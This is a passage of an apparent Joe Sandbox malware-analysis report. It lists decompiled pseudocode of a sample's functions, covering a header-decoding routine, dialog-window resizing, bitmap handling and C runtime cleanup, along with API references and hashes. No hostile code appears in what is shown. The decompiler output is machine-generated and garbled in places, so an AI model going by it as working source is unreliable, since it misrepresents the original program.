					_t39 = (_t66 >> 0x00000003 & 0x00000003) + 1;
					 *((intOrPtr*)(_t91 + 0x10)) = _t39;
					if(_t39 == 4) {
						goto L12;
					}
					_t86[3] = _t39 + 2;
					_t86[1] = (_t66 & 0x00000007) + 1;
					 *(_t91 + 0x20) = E00C6A898(_t88) >> 8;
					E00C6A881(_t88, 8);
					if( *((intOrPtr*)(_t91 + 0x10)) <= _t61) {
						L8:
						_t84 =  *(_t91 + 0x14);
						 *_t86 = _t61;
						if((_t61 >> 0x00000010 ^ _t61 >> 0x00000008 ^ _t61 ^ _t84 ^ 0x0000005a) !=  *((intOrPtr*)(_t91 + 0x1c))) {
							goto L12;
						}
						_t47 =  *_t88;
						_t86[2] = _t47;
						_t23 = _t47 - 1; // -1
						_t48 =  *((intOrPtr*)(_t89 + 0x88));
						_t78 = _t23 + _t61;
						if(_t48 >= _t78) {
							_t48 = _t78;
						}
						 *((intOrPtr*)(_t89 + 0x88)) = _t48;
						_t86[4] = _t84 >> 0x00000006 & 0x00000001;
						_t86[4] = _t84 >> 7;
						return 1;
					}
					_t87 =  *((intOrPtr*)(_t91 + 0x10));
					_t90 = _t61;
					do {
						_t55 = E00C6A898(_t88) >> 8 << _t90;
						_t90 = _t90 + 8;
						_t61 = _t61 + _t55;
						_t82 =  *(_t88 + 4) + 8;
						 *_t88 =  *_t88 + (_t82 >> 3);
						 *(_t88 + 4) = _t82 & 0x00000007;
						_t87 = _t87 - 1;
					} while (_t87 != 0);
					_t86 =  *(_t91 + 0x28);
					_t89 =  *(_t91 + 0x18);
					goto L8;
				} else {
					L12:
					return 0;
				}
			}

0x00c73e11
0x00c73e15
0x00c73e18
0x00c73e1c
0x00c73e1e
0x00c73e22
0x00c73e28
0x00c73e4f
0x00c73e62
0x00c73e66
0x00c73e6f
0x00c73e7a
0x00c73e7b
0x00c73e82
0x00000000
0x00000000
0x00c73e8f
0x00c73e92
0x00c73ea3
0x00c73ea7
0x00c73eb0
0x00c73eeb
0x00c73eeb
0x00c73efb
0x00c73f08
0x00000000
0x00000000
0x00c73f0a
0x00c73f0c
0x00c73f0f
0x00c73f12
0x00c73f18
0x00c73f1c
0x00c73f1e
0x00c73f1e
0x00c73f20
0x00c73f30
0x00c73f35
0x00000000
0x00c73f35
0x00c73eb2
0x00c73eb6
0x00c73eb8
0x00c73ec4
0x00c73ec6
0x00c73ecc
0x00c73ece
0x00c73ed9
0x00c73edb
0x00c73ede
0x00c73ede
0x00c73ee3
0x00c73ee7
0x00000000
0x00c73f3a
0x00c73f3a
0x00000000
0x00c73f3a

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
Instruction ID: e9a21dd0a782c878e32a6979c03e1bff0e33fddf865b6561104419a10e289548
Opcode Fuzzy Hash: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
Instruction Fuzzy Hash: 9231E7B1A147568FCB18DF28C89116EBBE0FB95304F10852DE4D9D7341C735EA0ADB91

Uniqueness

Uniqueness Score: -1.00%

Function 00C6E2E8 Relevance: 26.5, APIs: 12, Strings: 3, Instructions: 234
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E00C6E2E8(struct HWND__* __ecx, void* __edx, void* __eflags, intOrPtr _a8) {
				char _v0;
				struct HWND__* _v8;
				short _v2048;
				char _v2208;
				char _v2288;
				signed int _v2292;
				char _v2300;
				intOrPtr _v2304;
				struct tagRECT _v2320;
				intOrPtr _v2324;
				intOrPtr _v2336;
				struct tagRECT _v2352;
				struct tagRECT _v2368;
				signed int _v2376;
				char _v2377;
				intOrPtr _v2384;
				intOrPtr _v2393;
				void* __ebx;
				void* __esi;
				signed int _t95;
				struct HWND__* _t106;
				signed int _t119;
				signed int _t134;
				signed int _t145;
				void* _t150;
				void* _t155;
				char _t156;
				void* _t157;
				signed int _t158;
				intOrPtr _t160;
				void* _t163;
				void* _t169;
				long _t170;
				signed int _t174;
				void* _t178;
				signed int _t179;
				signed int _t186;
				struct HWND__* _t187;
				struct HWND__* _t188;
				void* _t189;
				void* _t192;
				signed int _t193;
				long _t194;
				void* _t201;
				int* _t202;
				struct HWND__* _t203;
				void* _t205;
				void* _t206;
				void* _t208;
				void* _t210;
				void* _t214;
				signed int _t221;

				_t178 = __edx;
				_t203 = __ecx;
				_v2368.bottom = __ecx;
				E00C64092( &_v2208, 0x50, L"$%s:", _a8);
				_t208 =  &_v2368 + 0x10;
				E00C71DA7( &_v2208,  &_v2288, 0x50);
				_t95 = E00C83E90( &_v2300);
				_t187 = _v8;
				_t155 = 0;
				_v2376 = _t95;
				_t210 =  *0xc9e720 - _t155; // 0x64
				if(_t210 <= 0) {
					L8:
					_t156 = E00C6D81C(_t155, _t203, _t178, _t189, _t214, _a8,  &(_v2368.right),  &(_v2368.top));
					_v2377 = _t156;
					GetWindowRect(_t187,  &_v2352);
					GetClientRect(_t187,  &(_v2320.top));
					_t169 = _v2352.right - _v2352.left + 1;
					_t179 = _v2320.bottom;
					_t192 = _v2352.bottom - _v2352.top + 1;
					_v2368.right = 0x64;
					_t205 = _t192 - _v2304;
					_v2368.bottom = _t169 - _t179;
					if(_v0 == 0) {
						if(_t156 != 0) {
							_t158 = 0x64;
							asm("cdq");
							_t134 = _v2292 * _v2368.top;
							_t160 = _t179 * _v2368.right / _t158 + _v2352.right;
							_v2324 = _t160;
							asm("cdq");
							_t186 = _t134 % _v2352.top;
							_v2352.left = _t134 / _v2352.top + _t205;
							asm("cdq");
							asm("cdq");
							_t201 = (_t192 - _v2352.left - _t186 >> 1) + _v2336;
							_t163 = (_t169 - _t160 - _t186 >> 1) + _v2352.bottom;
							if(_t163 < 0) {
								_t163 = 0;
							}
							if(_t201 < 0) {
								_t201 = 0;
							}
							_t145 =  !(GetWindowLongW(_t187, 0xfffffff0) >> 0xa) & 0x00000002 | 0x00000204;
							_t221 = _t145;
							 *0xcc3150(_t187, 0, _t163, _t201, _v2324, _v2352.left, _t145);
							GetWindowRect(_t187,  &_v2368);
							_t156 = _v2393;
						}
						if(E00C6D89C(_t156, _v2368.bottom, _t221, _a8, L"CAPTION",  &_v2048, 0x400) != 0) {
							SetWindowTextW(_t187,  &_v2048);
						}
					}
					_t206 = _t205 - GetSystemMetrics(8);
					_t106 = GetWindow(_t187, 5);
					_t188 = _t106;
					_v2368.bottom = _t188;
					if(_t156 == 0) {
						L23:
						return _t106;
					} else {
						_t157 = 0;
						while(_t188 != 0) {
							__eflags = _t157 - 0x200;
							if(_t157 >= 0x200) {
								goto L23;
							}
							GetWindowRect(_t188,  &_v2320);
							_t170 = _v2320.top.left;
							_t193 = 0x64;
							asm("cdq");
							_t194 = _v2320.left;
							asm("cdq");
							_t119 = (_t170 - _t206 - _v2336) * _v2368.top;
							asm("cdq");
							_t174 = 0x64;
							asm("cdq");
							asm("cdq");
							 *0xcc3150(_t188, 0, (_t194 - (_v2352.right - _t119 % _t174 >> 1) - _v2352.bottom) * _v2368.right / _t174, _t119 / _t174, (_v2320.right - _t194 + 1) * _v2368.right / _v2352.top, (_v2320.bottom - _t170 + 1) * _v2368.top / _t193, 0x204);
							_t106 = GetWindow(_t188, 2);
							_t188 = _t106;
							__eflags = _t188 - _v2384;
							if(_t188 == _v2384) {
								goto L23;
							}
							_t157 = _t157 + 1;
							__eflags = _t157;
						}
						goto L23;
					}
				} else {
					_t202 = 0xc9e274;
					do {
						if( *_t202 > 0) {
							_t9 =  &(_t202[1]); // 0xc94788
							_t150 = E00C86740( &_v2288,  *_t9, _t95);
							_t208 = _t208 + 0xc;
							if(_t150 == 0) {
								_t12 =  &(_t202[1]); // 0xc94788
								if(E00C6D9F0(_t155, _t203, _t202,  *_t12,  &_v2048, 0x400) != 0) {
									SetDlgItemTextW(_t187,  *_t202,  &_v2048);
								}
							}
							_t95 = _v2368.top;
						}
						_t155 = _t155 + 1;
						_t202 =  &(_t202[3]);
						_t214 = _t155 -  *0xc9e720; // 0x64
					} while (_t214 < 0);
					goto L8;
				}
			}

0x00c6e2e8
0x00c6e300
0x00c6e30a
0x00c6e30e
0x00c6e313
0x00c6e325
0x00c6e32f
0x00c6e334
0x00c6e33b
0x00c6e33e
0x00c6e342
0x00c6e348
0x00c6e3a5
0x00c6e3bd
0x00c6e3c5
0x00c6e3c9
0x00c6e3d5
0x00c6e3e7
0x00c6e3ee
0x00c6e3f2
0x00c6e3f5
0x00c6e3fd
0x00c6e40b
0x00c6e40f
0x00c6e417
0x00c6e424
0x00c6e427
0x00c6e430
0x00c6e435
0x00c6e43b
0x00c6e43f
0x00c6e440
0x00c6e446
0x00c6e450
0x00c6e457
0x00c6e460
0x00c6e464
0x00c6e468
0x00c6e46a
0x00c6e46a
0x00c6e46e
0x00c6e470
0x00c6e470
0x00c6e483
0x00c6e483
0x00c6e496
0x00c6e4a2
0x00c6e4a8
0x00c6e4a8
0x00c6e4d0
0x00c6e4db
0x00c6e4db
0x00c6e4d0
0x00c6e4ec
0x00c6e4ee
0x00c6e4f4
0x00c6e4f6
0x00c6e4fc
0x00c6e5ae
0x00c6e5ae
0x00c6e502
0x00c6e502
0x00c6e59c
0x00c6e509
0x00c6e50f
0x00000000
0x00000000
0x00c6e51b
0x00c6e525
0x00c6e53a
0x00c6e53f
0x00c6e542
0x00c6e558
0x00c6e560
0x00c6e562
0x00c6e563
0x00c6e56b
0x00c6e57d
0x00c6e584
0x00c6e58d
0x00c6e593
0x00c6e595
0x00c6e599
0x00000000
0x00000000
0x00c6e59b
0x00c6e59b
0x00c6e59b
0x00000000
0x00c6e59c
0x00c6e34a
0x00c6e34a
0x00c6e34f
0x00c6e352
0x00c6e355
0x00c6e35d
0x00c6e362
0x00c6e367
0x00c6e378
0x00c6e382
0x00c6e38f
0x00c6e38f
0x00c6e382
0x00c6e395
0x00c6e395
0x00c6e399
0x00c6e39a
0x00c6e39d
0x00c6e39d
0x00000000
0x00c6e34f

APIs

_swprintf.LIBCMT ref: 00C6E30E

Part of subcall function 00C64092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00C640A5

Part of subcall function 00C71DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,00CA1030,?,00C6D928,00000000,?,00000050,00CA1030), ref: 00C71DC4

_strlen.LIBCMT ref: 00C6E32F
SetDlgItemTextW.USER32(?,00C9E274,?), ref: 00C6E38F
GetWindowRect.USER32(?,?), ref: 00C6E3C9
GetClientRect.USER32(?,?), ref: 00C6E3D5
GetWindowLongW.USER32(?,000000F0), ref: 00C6E475
GetWindowRect.USER32(?,?), ref: 00C6E4A2
SetWindowTextW.USER32(?,?), ref: 00C6E4DB
GetSystemMetrics.USER32(00000008), ref: 00C6E4E3
GetWindow.USER32(?,00000005), ref: 00C6E4EE
GetWindowRect.USER32(00000000,?), ref: 00C6E51B
GetWindow.USER32(00000000,00000002), ref: 00C6E58D

Strings

d, xrefs: 00C6E3F5
CAPTION, xrefs: 00C6E4BD
$%s:, xrefs: 00C6E302

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
String ID: $%s:$CAPTION$d
API String ID: 2407758923-2512411981
Opcode ID: a8ba59322c9d98dd6c3239496b2969a84c645933e6d287c6c289833f9643f7ff
Instruction ID: b0f88ac38542fb171388f8b74ef0fecb72e6df3fb18c6fd7b85eb6f67f697e25
Opcode Fuzzy Hash: a8ba59322c9d98dd6c3239496b2969a84c645933e6d287c6c289833f9643f7ff
Instruction Fuzzy Hash: EC81A072208341AFD720DFA8DC89F6FBBE9EB88704F04492DFA9597250D630E9058B52

Uniqueness

Uniqueness Score: -1.00%

Function 00C8CB22 Relevance: 19.6, APIs: 13, Instructions: 114
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00C8CB22(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t25;
				intOrPtr* _t26;
				intOrPtr _t28;
				intOrPtr* _t29;
				intOrPtr* _t31;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr* _t55;
				intOrPtr* _t70;
				intOrPtr _t74;

				_t74 = _a4;
				_t25 =  *((intOrPtr*)(_t74 + 0x88));
				if(_t25 != 0 && _t25 != 0xc9eea0) {
					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
					if(_t45 != 0 &&  *_t45 == 0) {
						_t46 =  *((intOrPtr*)(_t74 + 0x84));
						if(_t46 != 0 &&  *_t46 == 0) {
							E00C88DCC(_t46);
							E00C8C701( *((intOrPtr*)(_t74 + 0x88)));
						}
						_t47 =  *((intOrPtr*)(_t74 + 0x80));
						if(_t47 != 0 &&  *_t47 == 0) {
							E00C88DCC(_t47);
							E00C8C7FF( *((intOrPtr*)(_t74 + 0x88)));
						}
						E00C88DCC( *((intOrPtr*)(_t74 + 0x7c)));
						E00C88DCC( *((intOrPtr*)(_t74 + 0x88)));
					}
				}
				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
				if(_t26 != 0 &&  *_t26 == 0) {
					E00C88DCC( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
					E00C88DCC( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
					E00C88DCC( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
					E00C88DCC( *((intOrPtr*)(_t74 + 0x8c)));
				}
				E00C8CC95( *((intOrPtr*)(_t74 + 0x9c)));
				_t28 = 6;
				_t55 = _t74 + 0xa0;
				_v8 = _t28;
				_t70 = _t74 + 0x28;
				do {
					if( *((intOrPtr*)(_t70 - 8)) != 0xc9e968) {
						_t31 =  *_t70;
						if(_t31 != 0 &&  *_t31 == 0) {
							E00C88DCC(_t31);
							E00C88DCC( *_t55);
						}
						_t28 = _v8;
					}
					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
						_t29 =  *((intOrPtr*)(_t70 - 4));
						if(_t29 != 0 &&  *_t29 == 0) {
							E00C88DCC(_t29);
						}
						_t28 = _v8;
					}
					_t55 = _t55 + 4;
					_t70 = _t70 + 0x10;
					_t28 = _t28 - 1;
					_v8 = _t28;
				} while (_t28 != 0);
				return E00C88DCC(_t74);
			}

0x00c8cb2a
0x00c8cb2e
0x00c8cb36
0x00c8cb3f
0x00c8cb44
0x00c8cb4b
0x00c8cb53
0x00c8cb5b
0x00c8cb66
0x00c8cb6c
0x00c8cb6d
0x00c8cb75
0x00c8cb7d
0x00c8cb88
0x00c8cb8e
0x00c8cb92
0x00c8cb9d
0x00c8cba3
0x00c8cb44
0x00c8cba4
0x00c8cbac
0x00c8cbbf
0x00c8cbd2
0x00c8cbe0
0x00c8cbeb
0x00c8cbf0
0x00c8cbf9
0x00c8cc01
0x00c8cc02
0x00c8cc08
0x00c8cc0b
0x00c8cc0e
0x00c8cc15
0x00c8cc17
0x00c8cc1b
0x00c8cc23
0x00c8cc2a
0x00c8cc30
0x00c8cc31
0x00c8cc31
0x00c8cc38
0x00c8cc3a
0x00c8cc3f
0x00c8cc47
0x00c8cc4c
0x00c8cc4d
0x00c8cc4d
0x00c8cc50
0x00c8cc53
0x00c8cc56
0x00c8cc59
0x00c8cc59
0x00c8cc6b

APIs

___free_lconv_mon.LIBCMT ref: 00C8CB66

Part of subcall function 00C8C701: _free.LIBCMT ref: 00C8C71E
Part of subcall function 00C8C701: _free.LIBCMT ref: 00C8C730
Part of subcall function 00C8C701: _free.LIBCMT ref: 00C8C742
Part of subcall function 00C8C701: _free.LIBCMT ref: 00C8C754
Part of subcall function 00C8C701: _free.LIBCMT ref: 00C8C766
Part of subcall function 00C8C701: _free.LIBCMT ref: 00C8C778
Part of subcall function 00C8C701: _free.LIBCMT ref: 00C8C78A
Part of subcall function 00C8C701: _free.LIBCMT ref: 00C8C79C
Part of subcall function 00C8C701: _free.LIBCMT ref: 00C8C7AE
Part of subcall function 00C8C701: _free.LIBCMT ref: 00C8C7C0
Part of subcall function 00C8C701: _free.LIBCMT ref: 00C8C7D2
Part of subcall function 00C8C701: _free.LIBCMT ref: 00C8C7E4
Part of subcall function 00C8C701: _free.LIBCMT ref: 00C8C7F6

_free.LIBCMT ref: 00C8CB5B

Part of subcall function 00C88DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00C8C896,?,00000000,?,00000000,?,00C8C8BD,?,00000007,?,?,00C8CCBA,?), ref: 00C88DE2
Part of subcall function 00C88DCC: GetLastError.KERNEL32(?,?,00C8C896,?,00000000,?,00000000,?,00C8C8BD,?,00000007,?,?,00C8CCBA,?,?), ref: 00C88DF4

_free.LIBCMT ref: 00C8CB7D
_free.LIBCMT ref: 00C8CB92
_free.LIBCMT ref: 00C8CB9D
_free.LIBCMT ref: 00C8CBBF
_free.LIBCMT ref: 00C8CBD2
_free.LIBCMT ref: 00C8CBE0
_free.LIBCMT ref: 00C8CBEB
_free.LIBCMT ref: 00C8CC23
_free.LIBCMT ref: 00C8CC2A
_free.LIBCMT ref: 00C8CC47
_free.LIBCMT ref: 00C8CC5F

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: d36fdb43792e4b3e5d6bf502dcafdb7910d6ecd01379b3226b7f9959c98109fb
Instruction ID: e4e69ecf3299a9c23adf1e668390784d59bed757d2ea47ca20d2239ac73b9ef5
Opcode Fuzzy Hash: d36fdb43792e4b3e5d6bf502dcafdb7910d6ecd01379b3226b7f9959c98109fb
Instruction Fuzzy Hash: 61316F316007069FEB20BA38D886B6A77E9FF10318F51442AE168D7692DF31ED45DB28

Uniqueness

Uniqueness Score: -1.00%

Function 00C7D69E Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 79
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00C7D69E(void* __ecx, void* __edx, void* __eflags, void* __fp0, short _a24, struct HWND__* _a4124) {
				void _v0;
				intOrPtr _v4;
				intOrPtr _v12;
				struct HWND__* _t9;
				void* _t19;
				void* _t26;
				void* _t28;
				void* _t30;
				struct HWND__* _t33;
				struct HWND__* _t36;
				void* _t40;
				void* _t49;

				_t49 = __fp0;
				_t40 = __eflags;
				_t28 = __edx;
				E00C7EC50(0x1018);
				_t9 = E00C7A5C6(_t40);
				if(_t9 == 0) {
					L12:
					return _t9;
				}
				_t9 = GetWindow(_a4124, 5);
				_t33 = _t9;
				_t30 = 0;
				_t36 = _t33;
				if(_t33 == 0) {
					L11:
					goto L12;
				}
				while(_t30 < 0x200) {
					GetClassNameW(_t33,  &_a24, 0x800);
					if(E00C71FBB( &_a24, L"STATIC") == 0 && (GetWindowLongW(_t33, 0xfffffff0) & 0x0000001f) == 0xe) {
						_t26 = SendMessageW(_t33, 0x173, 0, 0);
						if(_t26 != 0) {
							GetObjectW(_t26, 0x18,  &_v0);
							_t19 = E00C7A605(_v4);
							SendMessageW(_t33, 0x172, 0, E00C7A80C(_t28, _t49, _t26, E00C7A5E4(_v12), _t19));
							DeleteObject(_t26);
						}
					}
					_t9 = GetWindow(_t33, 2);
					_t33 = _t9;
					if(_t33 != _t36) {
						_t30 = _t30 + 1;
						if(_t33 != 0) {
							continue;
						}
					}
					break;
				}
				goto L11;
			}

0x00c7d69e
0x00c7d69e
0x00c7d69e
0x00c7d6a3
0x00c7d6a8
0x00c7d6af
0x00c7d786
0x00c7d78c
0x00c7d78c
0x00c7d6c1
0x00c7d6c7
0x00c7d6c9
0x00c7d6cb
0x00c7d6cf
0x00c7d783
0x00000000
0x00c7d785
0x00c7d6d6
0x00c7d6ed
0x00c7d704
0x00c7d726
0x00c7d72a
0x00c7d734
0x00c7d73e
0x00c7d75d
0x00c7d764
0x00c7d764
0x00c7d72a
0x00c7d76d
0x00c7d773
0x00c7d777
0x00c7d779
0x00c7d77c
0x00000000
0x00000000
0x00c7d77c
0x00000000
0x00c7d777
0x00000000

APIs

GetWindow.USER32(?,00000005), ref: 00C7D6C1
GetClassNameW.USER32(00000000,?,00000800), ref: 00C7D6ED

Part of subcall function 00C71FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00C6C116,00000000,.exe,?,?,00000800,?,?,?,00C78E3C), ref: 00C71FD1

GetWindowLongW.USER32(00000000,000000F0), ref: 00C7D709
SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 00C7D720
GetObjectW.GDI32(00000000,00000018,?), ref: 00C7D734
SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 00C7D75D
DeleteObject.GDI32(00000000), ref: 00C7D764
GetWindow.USER32(00000000,00000002), ref: 00C7D76D

Strings

STATIC, xrefs: 00C7D6F3

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
String ID: STATIC
API String ID: 3820355801-1882779555
Opcode ID: 13e60f8cf288e179fc78896953f5c2a4d2e97684d9afd1d0b55a108670f4b057
Instruction ID: cbdda10dc1f71700df7a2a38e4183d45739fbe0da16a32bec32b7ffd8f4833eb
Opcode Fuzzy Hash: 13e60f8cf288e179fc78896953f5c2a4d2e97684d9afd1d0b55a108670f4b057
Instruction Fuzzy Hash: 4F1133731007507FE7217BB0EC4AFAF766CAF44741F00C121FA6AA60D5DB648B0552B6

Uniqueness

Uniqueness Score: -1.00%

Function 00C896F1 Relevance: 15.1, APIs: 10, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00C896F1(char _a4) {
				char _v8;

				_t26 = _a4;
				_t52 =  *_a4;
				if( *_a4 != 0xc96430) {
					E00C88DCC(_t52);
					_t26 = _a4;
				}
				E00C88DCC( *((intOrPtr*)(_t26 + 0x3c)));
				E00C88DCC( *((intOrPtr*)(_a4 + 0x30)));
				E00C88DCC( *((intOrPtr*)(_a4 + 0x34)));
				E00C88DCC( *((intOrPtr*)(_a4 + 0x38)));
				E00C88DCC( *((intOrPtr*)(_a4 + 0x28)));
				E00C88DCC( *((intOrPtr*)(_a4 + 0x2c)));
				E00C88DCC( *((intOrPtr*)(_a4 + 0x40)));
				E00C88DCC( *((intOrPtr*)(_a4 + 0x44)));
				E00C88DCC( *((intOrPtr*)(_a4 + 0x360)));
				_v8 =  &_a4;
				E00C895A9(5,  &_v8);
				_v8 =  &_a4;
				return E00C895F9(4,  &_v8);
			}

0x00c896f7
0x00c896fa
0x00c89702
0x00c89705
0x00c8970a
0x00c8970d
0x00c89711
0x00c8971c
0x00c89727
0x00c89732
0x00c8973d
0x00c89748
0x00c89753
0x00c8975e
0x00c8976c
0x00c89774
0x00c8977d
0x00c89785
0x00c89799

APIs

_free.LIBCMT ref: 00C89705

Part of subcall function 00C88DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00C8C896,?,00000000,?,00000000,?,00C8C8BD,?,00000007,?,?,00C8CCBA,?), ref: 00C88DE2
Part of subcall function 00C88DCC: GetLastError.KERNEL32(?,?,00C8C896,?,00000000,?,00000000,?,00C8C8BD,?,00000007,?,?,00C8CCBA,?,?), ref: 00C88DF4

_free.LIBCMT ref: 00C89711
_free.LIBCMT ref: 00C8971C
_free.LIBCMT ref: 00C89727
_free.LIBCMT ref: 00C89732
_free.LIBCMT ref: 00C8973D
_free.LIBCMT ref: 00C89748
_free.LIBCMT ref: 00C89753
_free.LIBCMT ref: 00C8975E
_free.LIBCMT ref: 00C8976C

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: bd03b2a80e1e8e7ff9f20dbfbf954f4fd8467fd98d00a86d284bfa19c8fd80c1
Instruction ID: f826fc38464521f8c8b0ef3134ef16127ceaf55298ba7f257352c515771fa5ea
Opcode Fuzzy Hash: bd03b2a80e1e8e7ff9f20dbfbf954f4fd8467fd98d00a86d284bfa19c8fd80c1
Instruction Fuzzy Hash: 2B11B97511010ABFCB01FF54C942CDD3BB6EF14354B9255A2FA084F662DE31DE55AB88

Uniqueness

Uniqueness Score: -1.00%

Function 00C82E31 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 303
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 64%

			E00C82E31(signed int __edx, signed char* _a4, signed int _a8, signed int _a12, char _a16, signed int* _a20, signed int _a24, signed int _a28, signed int _a32) {
				signed char* _v0;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				signed int _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				void _v64;
				signed int _v68;
				char _v84;
				intOrPtr _v88;
				signed int _v92;
				intOrPtr _v100;
				void _v104;
				intOrPtr* _v112;
				signed char* _v184;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t201;
				signed int _t202;
				char _t203;
				signed int _t205;
				signed int _t207;
				signed char* _t208;
				signed int _t209;
				signed int _t210;
				signed int _t214;
				void* _t217;
				signed char* _t220;
				void* _t222;
				void* _t224;
				signed char _t228;
				signed int _t229;
				void* _t231;
				void* _t234;
				void* _t237;
				signed int _t247;
